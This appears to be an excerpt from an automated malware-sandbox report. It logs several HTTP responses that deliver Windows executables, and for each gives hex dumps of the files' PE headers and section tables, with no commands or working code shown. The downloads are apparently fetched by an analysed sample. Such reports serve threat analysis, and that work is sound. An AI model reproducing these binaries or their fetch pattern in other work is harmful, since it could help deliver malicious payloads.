d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:04:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:10 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:11 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:12 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:13 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:14 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:15 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 